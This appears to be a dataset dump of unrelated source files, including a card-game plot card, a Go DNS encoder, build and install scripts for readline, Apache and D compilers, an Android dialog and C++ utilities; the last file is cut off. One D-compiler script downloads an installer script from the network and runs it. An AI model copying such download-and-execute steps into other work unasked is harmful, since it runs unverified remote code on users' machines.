text stringlengths 1 1.05M |
|---|
const _ = require('underscore');
const PlotCard = require('../../../plotcard.js');
/**
 * Rebuilding (01019) plot card.
 *
 * When revealed: prompts the controller to select up to 3 cards from their
 * own discard pile and shuffles the chosen cards back into their draw deck.
 */
class Rebuilding extends PlotCard {
    setupCardAbilities() {
        this.whenRevealed({
            handler: () => {
                this.game.promptForSelect(this.controller, {
                    numCards: 3,
                    activePromptTitle: 'Select up to 3 cards from discard',
                    source: this,
                    cardCondition: card => this.cardCondition(card),
                    onSelect: (player, cards) => this.doneSelect(player, cards)
                });
            }
        });
    }

    // A card is selectable only when it belongs to this plot's controller and
    // is currently in that player's discard pile.
    cardCondition(card) {
        const player = card.controller;
        return this.controller === player && player.findCardByUuid(player.discardPile, card.uuid);
    }

    // Moves each chosen card into the draw deck, then shuffles and announces.
    doneSelect(player, cards) {
        for (const card of cards) {
            player.moveCard(card, 'draw deck');
        }
        if (cards.length > 0) {
            // Fixed: the deck was previously reshuffled once per selected
            // card inside the loop; a single shuffle after all moves gives
            // the same result with less work.
            player.shuffleDrawDeck();
            this.game.addMessage('{0} uses {1} to shuffle {2} into their deck', player, this, cards);
        }
        return true;
    }
}

Rebuilding.code = '01019';

module.exports = Rebuilding;
|
<gh_stars>1-10
package dns
import (
"errors"
"fnd.localhost/handshake/encoding"
"io"
"io/ioutil"
)
const (
	// MaxResourceSize caps the serialized size of a resource, in bytes.
	// NOTE(review): not referenced in this chunk — confirm it is enforced
	// by the reader/writer elsewhere.
	MaxResourceSize = 512
)

// CompressorEncoder is implemented by records whose wire encoding uses a
// shared name-compression map in addition to the resource writer/reader.
type CompressorEncoder interface {
	Encode(w *ResourceWriter, compressMap map[string]int) error
	Decode(r *ResourceReader) error
}

// Resource is a set of DNS records sharing a single TTL.
type Resource struct {
	TTL     int
	Records []Record
}
// Encode serializes the resource to w.
//
// Wire layout: one version byte (currently 0), then each record as a
// one-byte record type followed by the record's own encoding. Everything is
// staged in a ResourceWriter first so w receives a single Write call.
func (rs *Resource) Encode(w io.Writer) error {
	rw := NewResourceWriter()
	if err := encoding.WriteUint8(rw, 0); err != nil {
		return err
	}
	// Name-compression map shared across all records in this resource.
	compMap := make(map[string]int)
	for _, record := range rs.Records {
		if err := encoding.WriteUint8(rw, uint8(record.Type())); err != nil {
			return err
		}
		switch rt := record.(type) {
		case encoding.Encoder:
			if err := rt.Encode(rw); err != nil {
				return err
			}
		case CompressorEncoder:
			// NOTE(review): switch cases are checked in order, so a record
			// implementing both interfaces takes the encoding.Encoder branch
			// above and never sees compMap — confirm this is intentional.
			if err := rt.Encode(rw, compMap); err != nil {
				return err
			}
		default:
			return errors.New("cannot encode record")
		}
	}
	if _, err := w.Write(rw.Bytes()); err != nil {
		return err
	}
	return nil
}
// Decode reads a serialized resource from r into rs, appending to
// rs.Records.
//
// The whole stream is buffered up front so a ResourceReader can be used for
// decompression-aware decoding. The leading version byte must be 0. Record
// entries (type byte + payload) are consumed until EOF, which is the normal
// termination condition.
func (rs *Resource) Decode(r io.Reader) error {
	buf, err := ioutil.ReadAll(r)
	if err != nil {
		return err
	}
	rr := NewResourceReader(buf)
	version, err := encoding.ReadUint8(rr)
	if err != nil {
		return err
	}
	if version != 0 {
		return errors.New("invalid serialization version")
	}
	for {
		recType, err := encoding.ReadUint8(rr)
		// EOF on the type byte means all records were read — clean exit.
		if err == io.EOF {
			return nil
		}
		if err != nil {
			return err
		}
		// Instantiate the concrete record for this type tag.
		var record Record
		switch RecordType(recType) {
		case RecordTypeDS:
			record = new(DSRecord)
		case RecordTypeNS:
			record = new(NSRecord)
		case RecordTypeGlue4:
			record = new(Glue4Record)
		case RecordTypeGlue6:
			record = new(Glue6Record)
		case RecordTypeSynth4:
			record = new(Synth4Record)
		case RecordTypeSynth6:
			record = new(Synth6Record)
		case RecordTypeTXT:
			record = new(TXTRecord)
		default:
			return errors.New("unknown record type")
		}
		switch rt := record.(type) {
		case encoding.Decoder:
			if err := rt.Decode(rr); err != nil {
				return err
			}
		case CompressorEncoder:
			// Same reader-based Decode; the interface split only changes
			// the Encode side.
			if err := rt.Decode(rr); err != nil {
				return err
			}
		default:
			return errors.New("cannot decode record")
		}
		rs.Records = append(rs.Records, record)
	}
}
|
TERMUX_PKG_HOMEPAGE="https://tiswww.case.edu/php/chet/readline/rltop.html"
TERMUX_PKG_DESCRIPTION="Library that allow users to edit command lines as they are typed in"
TERMUX_PKG_LICENSE="GPL-3.0"
TERMUX_PKG_DEPENDS="libandroid-support, ncurses"
TERMUX_PKG_BREAKS="bash (<< 5.0), readline-dev"
TERMUX_PKG_REPLACES="readline-dev"
# Package version = upstream base release + number of applied point patches.
_MAIN_VERSION=8.0
_PATCH_VERSION=4
TERMUX_PKG_VERSION=$_MAIN_VERSION.$_PATCH_VERSION
TERMUX_PKG_REVISION=1
TERMUX_PKG_SRCURL=https://mirrors.kernel.org/gnu/readline/readline-${_MAIN_VERSION}.tar.gz
TERMUX_PKG_SHA256=e339f51971478d369f8a053a330a190781acb9864cf4c541060f12078948e461
TERMUX_PKG_EXTRA_CONFIGURE_ARGS="--with-curses --enable-multibyte bash_cv_wcwidth_broken=no"
TERMUX_PKG_EXTRA_MAKE_ARGS="SHLIB_LIBS=-lncursesw"
TERMUX_PKG_CONFFILES="etc/inputrc"
termux_step_pre_configure() {
	# Download and apply each upstream readline point-release patch,
	# verifying every download against a pinned SHA-256 checksum.
	declare -A PATCH_CHECKSUMS
	PATCH_CHECKSUMS[001]=d8e5e98933cf5756f862243c0601cb69d3667bb33f2c7b751fe4e40b2c3fd069
	PATCH_CHECKSUMS[002]=36b0febff1e560091ae7476026921f31b6d1dd4c918dcb7b741aa2dad1aec8f7
	PATCH_CHECKSUMS[003]=94ddb2210b71eb5389c7756865d60e343666dfb722c85892f8226b26bb3eeaef
	PATCH_CHECKSUMS[004]=b1aa3d2a40eee2dea9708229740742e649c32bb8db13535ea78f8ac15377394c
	for PATCH_NUM in $(seq -f '%03g' "${_PATCH_VERSION}"); do
		# Quote all expansions so cache paths with spaces cannot split args.
		PATCHFILE="$TERMUX_PKG_CACHEDIR/readline_patch_${PATCH_NUM}.patch"
		termux_download \
			"http://mirrors.kernel.org/gnu/readline/readline-$_MAIN_VERSION-patches/readline${_MAIN_VERSION/./}-$PATCH_NUM" \
			"$PATCHFILE" \
			"${PATCH_CHECKSUMS[$PATCH_NUM]}"
		patch -p0 -i "$PATCHFILE"
	done
	CFLAGS+=" -fexceptions"
}
termux_step_post_make_install() {
	# Install the pkg-config file and the packaged default inputrc.
	# Paths are quoted: $TERMUX_PREFIX is not guaranteed space-free.
	mkdir -p "$TERMUX_PREFIX/lib/pkgconfig"
	cp readline.pc "$TERMUX_PREFIX/lib/pkgconfig/"

	mkdir -p "$TERMUX_PREFIX/etc"
	cp "$TERMUX_PKG_BUILDER_DIR/inputrc" "$TERMUX_PREFIX/etc/"
}
|
package validator
import (
"github.com/go-playground/validator/v10"
"regexp"
)
// phone validates a Chinese mainland mobile number: a leading 1, a second
// digit 3-9, and 11 digits in total.
func phone(fl validator.FieldLevel) bool {
	matched, err := regexp.MatchString(`^1[3-9]\d{9}$`, fl.Field().String())
	if err != nil {
		// A malformed pattern cannot match anything; previously the error
		// was silently discarded with a blank identifier.
		return false
	}
	return matched
}
|
#!/bin/bash
# Build and install Apache httpd 2.2.22 from the bundled sources and set it
# up as a system service running as the www user.
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH

# Verify the current user is root; abort otherwise.
# (Fixed: "|| echo ... || exit 1" only exited when echo itself failed, so
# the script previously continued as a non-root user.)
if [ "$(id -u)" != 0 ]; then
    echo "Error: You must be root to run this script, please use root to install lnmp"
    exit 1
fi

# Ensure the www group/user exist, creating them only when missing.
# (Fixed: the trailing ";" made useradd run unconditionally before.)
if ! id www >/dev/null 2>&1; then
    groupadd www
    useradd -s /sbin/nologin -g www www
fi

cd ./packages || exit 1
tar zxvf httpd-2.2.22.tar.gz
cd httpd-2.2.22/ || exit 1
./configure --prefix=/usr/local/apache --enable-so --enable-rewrite
make && make install

# Return to the top-level directory and clean up the build tree.
cd ../../
rm -rf ./packages/httpd-2.2.22
\cp -rpv conf/httpd.conf /usr/local/apache/conf/httpd.conf
mkdir -p /usr/local/apache/conf/vhost
chown www:www -R /usr/local/apache

# Install the init script and enable Apache at boot.
rpm -ivh ./packages/dos2unix-3.1-37.el6.x86_64.rpm
\cp -rpv ./conf/apache /etc/init.d/
dos2unix /etc/init.d/apache
chmod +x /etc/init.d/apache
# Fixed: chkconfig expects "--add <name>", not "<name> --add".
chkconfig --add apache
chkconfig apache on
service apache start
|
#!/bin/sh
# Map a short "<arch>-<libc>" alias (e.g. aarch64-gnu, x86_64-musl) to the
# corresponding Rust target triple and print it on stdout.
BP=$(dirname "$0")
MARK_ARCH="$1"
case "$MARK_ARCH" in
    aarch64-gnu)     TARGET_ARCH="aarch64-unknown-linux-gnu" ;;
    arm-gnu)         TARGET_ARCH="arm-unknown-linux-gnueabihf" ;;
    armv7-gnu)       TARGET_ARCH="armv7-unknown-linux-gnueabihf" ;;
    i586-gnu)        TARGET_ARCH="i586-unknown-linux-gnu" ;;
    i686-gnu)        TARGET_ARCH="i686-unknown-linux-gnu" ;;
    mips-gnu)        TARGET_ARCH="mips-unknown-linux-gnu" ;;
    mipsel-gnu)      TARGET_ARCH="mipsel-unknown-linux-gnu" ;;
    mips64-gnu)      TARGET_ARCH="mips64-unknown-linux-gnuabi64" ;;
    mips64el-gnu)    TARGET_ARCH="mips64el-unknown-linux-gnuabi64" ;;
    powerpc-gnu)     TARGET_ARCH="powerpc-unknown-linux-gnu" ;;
    powerpc64-gnu)   TARGET_ARCH="powerpc64-unknown-linux-gnu" ;;
    powerpc64le-gnu) TARGET_ARCH="powerpc64le-unknown-linux-gnu" ;;
    riscv64-gnu)     TARGET_ARCH="riscv64gc-unknown-linux-gnu" ;;
    s390x-gnu)       TARGET_ARCH="s390x-unknown-linux-gnu" ;;
    sparc64-gnu)     TARGET_ARCH="sparc64-unknown-linux-gnu" ;;
    x86_64-gnu)      TARGET_ARCH="x86_64-unknown-linux-gnu" ;;
    aarch64-musl)    TARGET_ARCH="aarch64-unknown-linux-musl" ;;
    arm-musl)        TARGET_ARCH="arm-unknown-linux-musleabihf" ;;
    armv7-musl)      TARGET_ARCH="armv7-unknown-linux-musleabihf" ;;
    i586-musl)       TARGET_ARCH="i586-unknown-linux-musl" ;;
    i686-musl)       TARGET_ARCH="i686-unknown-linux-musl" ;;
    mips-musl)       TARGET_ARCH="mips-unknown-linux-musl" ;;
    mipsel-musl)     TARGET_ARCH="mipsel-unknown-linux-musl" ;;
    mips64-musl)     TARGET_ARCH="mips64-unknown-linux-muslabi64" ;;
    mips64el-musl)   TARGET_ARCH="mips64el-unknown-linux-muslabi64" ;;
    x86_64-musl)     TARGET_ARCH="x86_64-unknown-linux-musl" ;;
    help)
        # Fixed: the alias lists below previously omitted several supported
        # aliases (mipsel-*, mips64el-*, powerpc64le-gnu).
        echo "[usage]$0 arch" 1>&2
        echo "aarch64-gnu arm-gnu armv7-gnu i586-gnu i686-gnu mips-gnu mipsel-gnu mips64-gnu mips64el-gnu powerpc-gnu powerpc64-gnu powerpc64le-gnu riscv64-gnu s390x-gnu sparc64-gnu x86_64-gnu" 1>&2
        echo "aarch64-musl arm-musl armv7-musl i586-musl i686-musl mips-musl mipsel-musl mips64-musl mips64el-musl x86_64-musl" 1>&2
        exit
        ;;
    *)
        echo "[usage]$0 arch" 1>&2
        # Fixed: an unrecognised alias now signals failure to the caller
        # instead of exiting 0.
        exit 1
        ;;
esac
echo "$TARGET_ARCH"
|
package com.cbk.ask.utils;
import android.app.Dialog;
import android.content.Context;
import android.view.LayoutInflater;
import android.view.View;
import android.view.Window;
import android.widget.Button;
import android.widget.LinearLayout;
import android.widget.TextView;
import com.cbk.ask.R;
/**
* Created by sunyc
*/
/**
 * Simple confirmation dialog with a title, a content text and OK / Cancel
 * buttons. Any button click dismisses the dialog and is forwarded to the
 * registered {@link TipDialogListener}, if one was supplied.
 */
public class TipDialog extends Dialog implements android.view.View.OnClickListener {

    /** Callback fired after the dialog dismisses itself on a button click. */
    public interface TipDialogListener {
        void SetOnClick(View view);
    }

    private View view;
    private TextView tv_title_dialog;
    private TextView tv_content_dialog;
    private Button btn_ok;
    private Button btn_cancel;
    private TipDialogListener dialogListener;

    // Constructors
    public TipDialog(Context context, TipDialogListener tipDialogListener) {
        super(context);
        initView(context);
        this.dialogListener = tipDialogListener;
    }

    // NOTE: this constructor and the one below never set a listener, so
    // dialogListener stays null; onClick now guards against that.
    public TipDialog(Context context, int theme) {
        super(context, theme);
        initView(context);
    }

    protected TipDialog(Context context, boolean cancelable,
            OnCancelListener cancelListener) {
        super(context, cancelable, cancelListener);
        initView(context);
    }

    // Inflate the dialog layout and wire up the button click handlers.
    private void initView(Context context) {
        view = LayoutInflater.from(context).inflate(R.layout.layout_dialog_tip,
                null);
        tv_title_dialog = (TextView) view.findViewById(R.id.tv_title_dialog);
        tv_content_dialog = (TextView) view
                .findViewById(R.id.tv_content_dialog);
        btn_ok = (Button) view.findViewById(R.id.btn_dialog_ok);
        btn_cancel = (Button) view.findViewById(R.id.btn_dialog_cancel);
        btn_ok.setOnClickListener(this);
        btn_cancel.setOnClickListener(this);
    }

    public Button getBtn_ok() {
        return btn_ok;
    }

    public Button getBtn_cancel() {
        return btn_cancel;
    }

    public void SetContentTextSize(int size) {
        tv_content_dialog.setTextSize(size);
    }

    // Populate title/content and show the dialog without a title bar.
    public void show(String title, String content) {
        tv_title_dialog.setText(title);
        tv_content_dialog.setText(content);
        this.requestWindowFeature(Window.FEATURE_NO_TITLE);
        this.setContentView(view);
        this.getWindow().setLayout(LinearLayout.LayoutParams.WRAP_CONTENT,
                LinearLayout.LayoutParams.WRAP_CONTENT);
        this.show();
    }

    @Override
    public void onClick(View view) {
        this.dismiss();
        // Fixed: dialogListener is null when the (Context, int) or the
        // cancelable constructor was used; this previously threw a
        // NullPointerException on any button click.
        if (dialogListener != null) {
            dialogListener.SetOnClick(view);
        }
    }
}
|
<gh_stars>0
/*
* BSD 3-Clause License
*
* Copyright (c) 2019, Analog Devices, Inc.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* 3. Neither the name of the copyright holder nor the names of its
* contributors may be used to endorse or promote products derived from
* this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "device_enumerator_ethernet.h"
#include "network.h"
#include <glog/logging.h>
// Enumerator that discovers ToF devices served by a remote host at `ip`.
DeviceEnumeratorEthernet::DeviceEnumeratorEthernet(const std::string &ip)
    : m_ip(ip) {}

DeviceEnumeratorEthernet::~DeviceEnumeratorEthernet() = default;
// Queries the remote server at m_ip for its devices and appends one
// DeviceConstructionData entry per reported device to `devices`.
//
// Returns UNREACHABLE when the connection fails, INVALID_ARGUMENT when the
// command cannot be sent, GENERIC_ERROR on receive or server-side failure,
// otherwise the status code reported by the server.
aditof::Status DeviceEnumeratorEthernet::findDevices(
    std::vector<aditof::DeviceConstructionData> &devices) {
    using namespace aditof;
    Status status = Status::OK;

    LOG(INFO) << "Looking for devices over ethernet";

    std::unique_ptr<Network> net(new Network());

    if (net->ServerConnect(m_ip) != 0) {
        LOG(WARNING) << "Server Connect Failed";
        return Status::UNREACHABLE;
    }

    // Issue the remote "FindDevices" RPC and wait for its reply.
    net->send_buff.set_func_name("FindDevices");
    net->send_buff.set_expect_reply(true);

    if (net->SendCommand() != 0) {
        LOG(WARNING) << "Send Command Failed";
        return Status::INVALID_ARGUMENT;
    }

    if (net->recv_server_data() != 0) {
        LOG(WARNING) << "Receive Data Failed";
        return Status::GENERIC_ERROR;
    }

    if (net->recv_buff.server_status() !=
        payload::ServerStatus::REQUEST_ACCEPTED) {
        LOG(WARNING) << "API execution on Target Failed";
        return Status::GENERIC_ERROR;
    }

    // Translate each protobuf device description into the aditof struct,
    // tagging it with the IP it was discovered at.
    const payload::ServerResponse &msg = net->recv_buff;
    for (int i = 0; i < msg.device_info().size(); ++i) {
        const payload::DeviceConstructionData &pbData = msg.device_info(i);
        aditof::DeviceConstructionData tofData;

        tofData.deviceType =
            static_cast<aditof::DeviceType>(pbData.device_type());
        tofData.driverPath = pbData.driver_path();
        tofData.ip = m_ip;

        devices.push_back(tofData);
    }

    status = static_cast<Status>(net->recv_buff.status());

    return status;
}
|
#!/bin/bash
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
. ${SCRIPT_DIR}/common.inc
getgdc() {
    # Install the GDC binary release ${vers}+${build} under gdc${vers},
    # skipping when that directory already exists.
    vers=$1
    build=$2
    if [[ -d "gdc${vers}" ]]; then
        echo D ${vers} already installed, skipping
        return
    fi
    mkdir "gdc${vers}"
    # Guard pushd so a failed cd cannot unpack into the wrong directory.
    pushd "gdc${vers}" || return
    fetch "ftp://ftp.gdcproject.org/binaries/${vers}/x86_64-linux-gnu/gdc-${vers}+${build}.tar.xz" | tar Jxf -
    # stripping the D libraries seems to upset them, so just strip the exes
    do_strip x86_64-pc-linux-gnu/bin
    do_strip x86_64-pc-linux-gnu/libexec
    popd || return
}
getldc() {
    # Install the LDC release ${vers} under ldc${vers}, skipping if present.
    vers=$1
    if [[ -d "ldc${vers}" ]]; then
        echo LDC ${vers} already installed, skipping
        return
    fi
    mkdir "ldc${vers}"
    # Guard pushd so a failed cd cannot unpack into the wrong directory.
    pushd "ldc${vers}" || return
    fetch "https://github.com/ldc-developers/ldc/releases/download/v${vers}/ldc2-${vers}-linux-x86_64.tar.xz" | tar Jxf -
    # any kind of stripping upsets ldc
    popd || return
}
getldc_s3() {
    # Install an LDC build mirrored on the compiler-explorer S3 bucket.
    vers=$1
    if [[ -d "ldc2-${vers}" ]]; then
        echo LDC ${vers} already installed, skipping
        return
    fi
    fetch "https://s3.amazonaws.com/compiler-explorer/opt/ldc2-${vers}.tar.xz" | tar Jxf -
}
getldc_latestbeta() {
    # Install the latest LDC beta into ldcbeta, tracking the installed
    # version in a .version marker file so re-runs are cheap.
    vers=$(fetch https://ldc-developers.github.io/LATEST_BETA)
    if [[ ! -d ldcbeta ]]; then
        mkdir ldcbeta
    fi
    # Guard the pushd: without it, a failed cd would let the "rm -rf *"
    # below wipe the current working directory.
    pushd ldcbeta || return
    if [[ "$(cat .version)" == "${vers}" ]]; then
        echo "LDC beta version ${vers} already installed, skipping"
        popd || return
        return
    fi
    rm -rf *
    fetch "https://github.com/ldc-developers/ldc/releases/download/v${vers}/ldc2-${vers}-linux-x86_64.tar.xz" | tar Jxf - --strip-components 1
    echo "${vers}" >.version
    # any kind of stripping upsets ldc
    popd || return
}
getldc_latest_ci() {
    # Use dlang's install.sh script to get the latest master CI build.
    DIR=ldc-latest-ci
    if [[ -d ${DIR} ]]; then
        rm -rf "${DIR}"
    fi
    mkdir "${DIR}"
    # Guard pushd so install.sh cannot run in the wrong directory.
    pushd "${DIR}" || return
    wget https://dlang.org/install.sh
    chmod +x install.sh
    ./install.sh install ldc-latest-ci -p "$(pwd)"
    # Rename the downloaded package directory to a constant "ldc" name
    mv ldc-* ldc
    chmod +rx ldc
    popd || return
}
getdmd_2x() {
    # Install the DMD 2.x release ${VER} under dmd-${VER}, skipping if present.
    VER=$1
    DIR=dmd-${VER}
    if [[ -d ${DIR} ]]; then
        echo DMD ${VER} already installed, skipping
        return
    fi
    mkdir "${DIR}"
    # Guard pushd so a failed cd cannot unpack into the wrong directory.
    pushd "${DIR}" || return
    fetch "http://downloads.dlang.org/releases/2.x/${VER}/dmd.${VER}.linux.tar.xz" | tar Jxf -
    popd || return
}
getdmd2_nightly() {
    # Use dlang's install.sh script to get the latest trunk build.
    # See: https://dlang.org/install.html
    DIR=dmd2-nightly
    if [[ -d ${DIR} ]]; then
        rm -rf "${DIR}"
    fi
    mkdir "${DIR}"
    # Guard pushd so install.sh cannot run in the wrong directory.
    pushd "${DIR}" || return
    wget https://dlang.org/install.sh
    chmod +x install.sh
    # Download and unpack dmd-nightly into current directory
    ./install.sh install dmd-nightly -p "$(pwd)"
    # Rename the downloaded package directory to a constant "dmd2" name
    mv dmd-master-* dmd2
    # Make directory readable for other users too
    chmod +rx dmd2
    popd || return
}
# Install the fixed roster of D compilers.
getgdc 4.8.2 2.064.2
getgdc 4.9.3 2.066.1
getgdc 5.2.0 2.066.1

# LDC releases: 0.17.2 plus every 1.x.0 from 1.0 through 1.18.
for version in \
    0.17.2 \
    1.{0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18}.0; do
    getldc ${version}
done

# Beta and CI builds are only fetched when nightlies are enabled.
if install_nightly; then
    getldc_latestbeta
    getldc_latest_ci
fi

getldc_s3 1.2.0

getdmd_2x 2.078.3
getdmd_2x 2.079.0
getdmd_2x 2.079.1
getdmd_2x 2.080.1
getdmd_2x 2.081.2
getdmd_2x 2.082.0
getdmd_2x 2.089.0

if install_nightly; then
    getdmd2_nightly
fi
|
define(function (require, exports, module) {
    // Thin bridge exposing the ctags updater behind a callback-style API.
    const ctags = require("../../../ctags");

    return {
        /**
         * Update the ctags index for `path` with `tags`, then invoke
         * `callback`. Note: the callback fires immediately after the
         * updateCTags call returns — presumably the update is synchronous;
         * confirm against the ctags module.
         */
        updateCTags(path, tags, callback) {
            ctags.updateCTags(path, tags);
            callback();
        }
    };
});
#!/bin/bash
# CI driver: sanity-check the toolchains, then run the Gradle build followed
# by the TypeScript, Python 3 and Python 2 test suites.

# abort script on error
set -e

# check java (default JDK plus the JDK 11 pointed to by JAVA_11_HOME)
java -version
$JAVA_11_HOME/bin/java -version

# check node
node --version
npm --version

# check python (both conda environments used by the test suites below)
source activate py3
python --version
source activate py2
python --version
source deactivate

# go to project
cd /project

# prepare gradle
chmod +x ./gradlew

# check Java 11 compatibility
# set OLD_JAVA_HOME=$JAVA_HOME
# export JAVA_HOME=$JAVA_11_HOME
# ./gradlew --version
# ./gradlew
# export JAVA_HOME=$OLD_JAVA_HOME

# run gradle
./gradlew --version
./gradlew

# run ts
pushd ts
chmod +x ./compile
./compile
popd

# run py3
pushd py3
chmod +x ./tests
./tests
popd

# run py2
pushd py2
chmod +x ./tests
./tests
popd
|
<reponame>vharsh/cattle2
package io.cattle.platform.process.agent;
import io.cattle.platform.agent.impl.AgentLocatorImpl;
import io.cattle.platform.core.model.Agent;
import io.cattle.platform.engine.handler.HandlerResult;
import io.cattle.platform.engine.handler.ProcessHandler;
import io.cattle.platform.engine.process.ProcessInstance;
import io.cattle.platform.engine.process.ProcessState;
import io.cattle.platform.object.ObjectManager;
import io.cattle.platform.object.process.ObjectProcessManager;
/**
 * Process handler that removes the agent associated with a resource being
 * torn down: the agent is deactivated and then removed.
 */
public class AgentResourceRemove implements ProcessHandler {

    ObjectManager objectManager;
    ObjectProcessManager processManager;

    public AgentResourceRemove(ObjectManager objectManager, ObjectProcessManager processManager) {
        super();
        this.objectManager = objectManager;
        this.processManager = processManager;
    }

    @Override
    public HandlerResult handle(ProcessState state, ProcessInstance process) {
        // Resolve the agent tied to the resource under processing.
        final Object resource = state.getResource();
        final Long agentId = AgentLocatorImpl.getAgentId(resource);
        final Agent agent = objectManager.loadResource(Agent.class, agentId);

        // Nothing to do when no agent exists or it was already removed.
        if (agent == null || agent.getRemoved() != null) {
            return null;
        }

        processManager.deactivateThenRemove(agent, null);
        return null;
    }
}
|
<gh_stars>0
#pragma once
#include <Types>
#include <Functions>
template<FSize SizeBytes>
struct TByte;
// Fixed-size raw byte buffer with byte-copy conversion/assignment to and
// from arbitrary (trivially copyable) value types.
template<FSize SizeBytes>
struct TByte
{
    FRaw Data[SizeBytes];

    // Size of the buffer in bytes.
    inline FSize Size(
        FVoid
    )
    {
        return SizeBytes;
    }

    inline FSize Size(
        FVoid
    ) const
    {
        return SizeBytes;
    }

    // Reads exactly SizeBytes raw bytes from the stream.
    // (Removed an unused local `FSize Index` that drew compiler warnings.)
    friend FIStream &operator>>(
        FIStream &In,
        TByte<SizeBytes> &Rhs
    )
    {
        In.read((char *) Rhs.Data, SizeBytes);
        return In;
    }

    // Writes exactly SizeBytes raw bytes to the stream.
    friend FOStream &operator<<(
        FOStream &Out,
        const TByte<SizeBytes> &Rhs
    )
    {
        Out.write((char *) Rhs.Data, SizeBytes);
        return Out;
    }

    // Converts the buffer to TypeLhs by copying min(SizeBytes,
    // sizeof(TypeLhs)) bytes and zero-filling the rest of the target.
    //
    // Fixed: the zero-fill loop previously ran up to SizeBytes, writing past
    // the end of Lhs whenever SizeBytes > sizeof(TypeLhs) (stack overflow)
    // and leaving the tail of Lhs uninitialized otherwise; the bound must be
    // sizeof(TypeLhs).
    // NOTE(review): the raw byte copy assumes TypeLhs is trivially copyable.
    template<typename TypeLhs>
    operator TypeLhs(
        FVoid
    ) const
    {
        TypeLhs Lhs;
        FRaw *PtrLhs;
        FSize Index, End;
        PtrLhs = (FRaw *) &Lhs;
        End = Min(SizeBytes, sizeof(TypeLhs));
        for(Index = 0; Index < End; ++Index)
        {
            PtrLhs[Index] = Data[Index];
        }
        for( ; Index < sizeof(TypeLhs); ++Index)
        {
            PtrLhs[Index] = 0;
        }
        return Lhs;
    }

    // Assigns from TypeRhs by copying min(SizeBytes, sizeof(TypeRhs)) bytes
    // and zero-filling the remainder of Data.
    template<typename TypeRhs>
    TByte<SizeBytes> &operator=(
        const TypeRhs &Rhs
    )
    {
        FRaw *PtrRhs;
        FSize Index, End;
        PtrRhs = (FRaw *) &Rhs;
        End = Min(SizeBytes, sizeof(TypeRhs));
        for(Index = 0; Index < End; ++Index)
        {
            Data[Index] = PtrRhs[Index];
        }
        for( ; Index < SizeBytes; ++Index)
        {
            Data[Index] = 0;
        }
        return *this;
    }
};
// Byte-wise equality between an arbitrary value and a TByte buffer.
// Only the first min(SizeBytes, sizeof(TypeLhs)) bytes are compared.
template<typename TypeLhs, FSize SizeBytes>
FBool operator==(
    const TypeLhs &Lhs,
    const TByte<SizeBytes> &Rhs
)
{
    const FRaw *Bytes = (FRaw *) &Lhs;
    const FSize Count = Min(SizeBytes, sizeof(TypeLhs));
    for(FSize At = 0; At < Count; ++At)
    {
        if(Bytes[At] != Rhs.Data[At])
        {
            return False;
        }
    }
    return True;
}
// Symmetric overload: delegates to the (value, TByte) comparison above.
template<FSize SizeBytes, typename TypeRhs>
inline FBool operator==(
    const TByte<SizeBytes> &Lhs,
    const TypeRhs &Rhs
)
{
    return Rhs == Lhs;
}
// Byte-wise inequality between an arbitrary value and a TByte buffer.
//
// Fixed: the original looped over the bytes and returned False as soon as
// ANY byte matched, so it only reported "unequal" when every compared byte
// differed — for most distinct values both == and != were False.
// Inequality is simply the negation of operator==.
template<FSize SizeBytes, typename TypeLhs>
FBool operator!=(
    const TypeLhs &Lhs,
    const TByte<SizeBytes> &Rhs
)
{
    return (Lhs == Rhs) ? False : True;
}
// Symmetric overload: delegates to the (value, TByte) inequality.
template<FSize SizeBytes, typename TypeRhs>
inline FBool operator!=(
    const TByte<SizeBytes> &Lhs,
    const TypeRhs &Rhs
)
{
    const FBool Unequal = (Rhs != Lhs);
    return Unequal;
}
// Logical NOT: True when every byte of the buffer is zero.
template<FSize SizeBytes>
FBool operator!(
    const TByte<SizeBytes> &Rhs
)
{
    FSize At = 0;
    while(At < SizeBytes)
    {
        if(Rhs.Data[At] != 0)
        {
            return False;
        }
        ++At;
    }
    return True;
}
|
'use strict';

// Integration tests for the providers PUT endpoints.
const test = require('ava');
const request = require('supertest');

const { randomString } = require('@cumulus/common/test-utils');
const bootstrap = require('../../../lambdas/bootstrap');
const models = require('../../../models');
const {
    createFakeJwtAuthToken,
    fakeProviderFactory
} = require('../../../lib/testUtils');
const { Search } = require('../../../es/search');
const assertions = require('../../../lib/assertions');

// Randomize table/stack/bucket names so parallel test runs cannot collide.
process.env.UsersTable = randomString();
process.env.ProvidersTable = randomString();
process.env.stackName = randomString();
process.env.system_bucket = randomString();
process.env.TOKEN_SECRET = randomString();

// import the express app after setting the env variables
const { app } = require('../../../app');

// Shared fixtures, created in test.before and destroyed in test.after.
let providerModel;
const esIndex = randomString();
let esClient;
let accessTokenModel;
let jwtAuthToken;
let userModel;
// Stand up the fake Elasticsearch index and the model tables the provider
// endpoints depend on, and mint a valid JWT for authorized requests.
test.before(async () => {
    await bootstrap.bootstrapElasticSearch('fakehost', esIndex);
